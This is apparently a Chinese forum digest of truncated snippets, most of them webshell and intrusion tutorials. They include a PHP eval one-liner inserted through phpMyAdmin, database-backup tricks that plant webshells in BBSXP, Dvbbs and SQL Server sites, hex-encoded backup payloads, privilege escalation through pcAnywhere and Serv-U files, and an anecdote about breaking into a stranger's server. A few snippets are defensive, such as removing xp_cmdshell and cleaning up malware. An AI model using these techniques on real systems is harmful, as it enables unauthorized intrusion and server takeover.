Kafree收集整理来源：论坛转载无法确定出处，如有版权问题请与我们联系1.Stream对象组件："Adodb.Stream" 有下列方法： Cancel 方法 　　 使用方法如下 　　 Object.Cancel 　　 说明：取消执行挂起的异步 Execute 或 Open 方法的调用。 Close　方法 　　 使用方法如下 　　 Object.Close 　　 ：关闭对像 CopyT...

1.如何拿到登陆密码. 自己想办法 2.访问 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路径.3.选择一个Database.运行以下语句.----start code---Create TABLE a (cmd text NOT NULL);Insert INTO a (cmd) VALUES(’<?php eval($_POST[1]);?>...

遇一BBSXP后台:查看源文件.也没有value可以自定义.尝试修改上传类型.无奈不支持phpaspx.向数据库里插入一句话再备份.出现些XXX估计表里加入了什么东..访问:/bbs/Admin_fso.asp?menu=files&dir=../可以看到整站文件..找到一个文件名不常见的后台..运气不错.备份webshell之.....

1. 杀毒前关闭系统还原(Win2000系统可以忽略）：右键 我的电脑 ，属性，系统还原，在所有驱动器上关闭系统还原 打勾即可。 清除IE的临时文件：打开IE 点工具-->Internet选项 : Internet临时文件，点“删除文件”按钮 ，将 删除所有脱机内容 打勾，点确定删除。 关闭QQ等应用程序。 进入如下的操作前，请不要进行任何双击磁盘的操作。 所有的工具都放桌面上，切记。 2.用强制删除工具 PowerRMV&nbs...

转自：http://www.wrsky.com/read.php?tid=565作者：firefox+lvhuana今天上午上网的时候，非常无聊，好友都不在线。正在无聊的时候，突然qq响了，一个陌生人要加我，顺便先看下他的资料，哦哦，原来这个人还有个人站点呢，通过他加我请求。然后开始看他的个人站点，原来是一个外挂站，晕糊中，外挂站点的人加我作什么。。。。想想进他的站点看看吧，打开明小子的旁注工具2.2版本（这个启动速度快，我喜欢），扫了一下，看到他站点所在的服务器上面还有几个站点，再仔细扫了一下，发现一个dvbbs7.1的论坛的数据库是默认的dvbbs7.mdb，下载之，然后杀毒软件查下没有木...

作者:Jambalaya减少备份文件大小，得到可执行的webshell成功率提高不少一利用差异备份加一个参数WITHDIFFERENTIALdeclare@asysname,@snvarchar(4000)select@a=db_name(),@s=0x77006F006B0061006F002E00620061006B00backupdatabase@atodisk=@screatetable[dbo].[xiaolu]([cmd][image]);insertintoxiaolu(cmd)values(0x3C2565786563757465287265717565737428226122...

WEBSHELL权限提升技巧c: d: e:..... C:\Documents and Settings\All Users\「开始」菜单\程序\ 看这里能不能跳转，我们从这里可以获取好多有用的信息比如Serv-U的路径， C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 看能否跳转到这个目录，如果行那就最好了，直接下它的CIF文件，破解得到pcAnywhere密码，...

WEBSHELL权限提升技巧 c: d: e:..... C:\Documents and Settings\All Users\「开始」菜单\程序\ 看这里能不能跳转，我们从这里可以获取好多有用的信息比如Serv-U的路径， C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 看能否跳转到这个目录，如果行那就最好了，直接下它的CIF文件，破解得到pcAnywh...

[code]xp_cmdshell可以让系统管理员以操作系统命令行解释器的方式执行给定的命令字符串，并以文本行方式返回任何输出，是一个功能非常强大的扩展存贮过程。    一般情况下，xp_cmdshell对管理员来说也是不必要的，xp_cmdshell的消除不会对Server造成任何影响。    可以将xp_cmdshell消除：Use MasterExec sp_dropextendedproc N’xp_cmdshell’Go    如果需要...

环境：在2kserver+iis5成功，权限默认iusr权限 iis权限：脚本可执行 描述：在2K服务器上默认可以用server.createobject的方法来使用已经安装的组件. 比如大家都知道的ADO数据库控件,但是除了这些专门提供的组件外 还有一些本来是提供给系统使用的组件如WSH,FSO它们同样可以用上面的办法来使用， 当然现在大部分的asp后门都使用了它们，所以有的网管就删除或更改注册表中这两个组件的CLSID值 来禁用它们，当然也有的在"控制面板"的"添加删除程序"里把它们直接卸载...

 主要是利用后台对access数据库的“备份数据库”或“恢复数据库”功能，“备份的数据库路径”等变量没有过滤导致可以把任意文件后缀改为asp，从而得到webshell，msssql版的程序就直接应用了access版的代码，导致sql版照样可以利用。具体方法和分析可以参考angel的文章《动网论坛7.0获得WebShell的分析》。据我所知，目前还有很多的asp程序后台存在这样的漏洞，利用方法大同小异。   php+mysql程序   ① 利用后台的数据查询功能   　　在有的程序后台提...